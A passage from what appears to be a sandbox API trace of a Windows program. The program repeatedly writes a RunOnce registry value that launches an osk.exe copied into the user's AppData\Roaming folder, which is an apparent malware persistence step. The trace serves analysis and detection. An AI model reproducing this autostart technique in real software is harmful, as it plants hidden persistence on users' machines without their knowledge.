(in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.184] RegCloseKey (hKey=0x280) returned 0x0 [0104.184] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.184] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.184] SetTimer (hWnd=0x20280, nIDEvent=0x23f4, uElapse=0xa, lpTimerFunc=0x0) returned 0x23f4 [0104.184] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.198] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.198] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.198] KillTimer (hWnd=0x20280, uIDEvent=0x23f4) returned 1 [0104.199] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.199] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.199] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.199] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.199] RegCloseKey (hKey=0x280) returned 0x0 [0104.200] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.200] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.200] SetTimer (hWnd=0x20280, nIDEvent=0x23f5, uElapse=0xa, lpTimerFunc=0x0) returned 0x23f5 [0104.200] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.213] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.214] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.214] KillTimer (hWnd=0x20280, uIDEvent=0x23f5) returned 1 [0104.214] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.214] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.214] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.215] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.215] RegCloseKey (hKey=0x280) returned 0x0 [0104.215] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.215] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.215] SetTimer (hWnd=0x20280, nIDEvent=0x23f6, uElapse=0xa, lpTimerFunc=0x0) returned 0x23f6 [0104.215] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.243] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.243] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.244] KillTimer (hWnd=0x20280, uIDEvent=0x23f6) returned 1 [0104.244] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.244] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.245] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.245] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.245] RegCloseKey (hKey=0x280) returned 0x0 [0104.245] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.245] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.245] SetTimer (hWnd=0x20280, nIDEvent=0x23f7, uElapse=0xa, lpTimerFunc=0x0) returned 0x23f7 [0104.246] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.261] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.261] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.261] KillTimer (hWnd=0x20280, uIDEvent=0x23f7) returned 1 [0104.261] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.262] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.262] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.262] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.262] RegCloseKey (hKey=0x280) returned 0x0 [0104.262] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.262] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.262] SetTimer (hWnd=0x20280, nIDEvent=0x23f8, uElapse=0xa, lpTimerFunc=0x0) returned 0x23f8 [0104.262] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.276] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.276] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.276] KillTimer (hWnd=0x20280, uIDEvent=0x23f8) returned 1 [0104.276] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.277] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.277] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.277] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.277] RegCloseKey (hKey=0x280) returned 0x0 [0104.277] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.277] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.278] SetTimer (hWnd=0x20280, nIDEvent=0x23f9, uElapse=0xa, lpTimerFunc=0x0) returned 0x23f9 [0104.278] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.291] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.291] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.292] KillTimer (hWnd=0x20280, uIDEvent=0x23f9) returned 1 [0104.292] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.292] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.292] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.293] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.293] RegCloseKey (hKey=0x280) returned 0x0 [0104.293] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.293] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.293] SetTimer (hWnd=0x20280, nIDEvent=0x23fa, uElapse=0xa, lpTimerFunc=0x0) returned 0x23fa [0104.293] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.307] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.307] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.307] KillTimer (hWnd=0x20280, uIDEvent=0x23fa) returned 1 [0104.308] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.308] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.308] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.308] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.308] RegCloseKey (hKey=0x280) returned 0x0 [0104.308] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.309] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.309] SetTimer (hWnd=0x20280, nIDEvent=0x23fb, uElapse=0xa, lpTimerFunc=0x0) returned 0x23fb [0104.309] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.323] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.323] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.323] KillTimer (hWnd=0x20280, uIDEvent=0x23fb) returned 1 [0104.323] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.323] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.323] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.323] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.324] RegCloseKey (hKey=0x280) returned 0x0 [0104.324] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.324] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.324] SetTimer (hWnd=0x20280, nIDEvent=0x23fc, uElapse=0xa, lpTimerFunc=0x0) returned 0x23fc [0104.324] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.818] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.818] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.818] KillTimer (hWnd=0x20280, uIDEvent=0x23fc) returned 1 [0104.818] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.819] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.819] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.820] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.820] RegCloseKey (hKey=0x280) returned 0x0 [0104.820] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.820] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.820] SetTimer (hWnd=0x20280, nIDEvent=0x23fd, uElapse=0xa, lpTimerFunc=0x0) returned 0x23fd [0104.820] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.822] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.822] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.823] KillTimer (hWnd=0x20280, uIDEvent=0x23fd) returned 1 [0104.823] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.823] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.823] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.824] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.824] RegCloseKey (hKey=0x280) returned 0x0 [0104.824] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.824] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.824] SetTimer (hWnd=0x20280, nIDEvent=0x23fe, uElapse=0xa, lpTimerFunc=0x0) returned 0x23fe [0104.824] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.837] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.837] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.838] KillTimer (hWnd=0x20280, uIDEvent=0x23fe) returned 1 [0104.838] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.838] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.838] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.839] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.839] RegCloseKey (hKey=0x280) returned 0x0 [0104.839] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.839] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.839] SetTimer (hWnd=0x20280, nIDEvent=0x23ff, uElapse=0xa, lpTimerFunc=0x0) returned 0x23ff [0104.839] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.853] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.853] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.853] KillTimer (hWnd=0x20280, uIDEvent=0x23ff) returned 1 [0104.854] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.854] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.854] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.854] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.854] RegCloseKey (hKey=0x280) returned 0x0 [0104.855] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.855] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.855] SetTimer (hWnd=0x20280, nIDEvent=0x2400, uElapse=0xa, lpTimerFunc=0x0) returned 0x2400 [0104.855] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.869] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.869] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.869] KillTimer (hWnd=0x20280, uIDEvent=0x2400) returned 1 [0104.869] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.870] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.870] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.870] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.870] RegCloseKey (hKey=0x280) returned 0x0 [0104.870] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.870] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.870] SetTimer (hWnd=0x20280, nIDEvent=0x2401, uElapse=0xa, lpTimerFunc=0x0) returned 0x2401 [0104.870] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.884] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.884] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.885] KillTimer (hWnd=0x20280, uIDEvent=0x2401) returned 1 [0104.885] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.885] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.885] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.886] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.886] RegCloseKey (hKey=0x280) returned 0x0 [0104.886] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.886] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.886] SetTimer (hWnd=0x20280, nIDEvent=0x2402, uElapse=0xa, lpTimerFunc=0x0) returned 0x2402 [0104.886] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.900] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.900] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.900] KillTimer (hWnd=0x20280, uIDEvent=0x2402) returned 1 [0104.900] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.900] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.901] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.901] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.901] RegCloseKey (hKey=0x280) returned 0x0 [0104.901] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.901] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.901] SetTimer (hWnd=0x20280, nIDEvent=0x2403, uElapse=0xa, lpTimerFunc=0x0) returned 0x2403 [0104.901] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.915] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.916] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.916] KillTimer (hWnd=0x20280, uIDEvent=0x2403) returned 1 [0104.916] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.916] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.916] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.917] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.917] RegCloseKey (hKey=0x280) returned 0x0 [0104.917] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.917] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.917] SetTimer (hWnd=0x20280, nIDEvent=0x2404, uElapse=0xa, lpTimerFunc=0x0) returned 0x2404 [0104.917] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.931] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.931] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.931] KillTimer (hWnd=0x20280, uIDEvent=0x2404) returned 1 [0104.931] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.932] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.932] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.932] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.932] RegCloseKey (hKey=0x280) returned 0x0 [0104.932] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.932] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.932] SetTimer (hWnd=0x20280, nIDEvent=0x2405, uElapse=0xa, lpTimerFunc=0x0) returned 0x2405 [0104.932] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.947] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.947] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.947] KillTimer (hWnd=0x20280, uIDEvent=0x2405) returned 1 [0104.947] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.947] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.948] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.948] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.948] RegCloseKey (hKey=0x280) returned 0x0 [0104.948] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.948] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.948] SetTimer (hWnd=0x20280, nIDEvent=0x2406, uElapse=0xa, lpTimerFunc=0x0) returned 0x2406 [0104.948] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.962] TranslateMessage 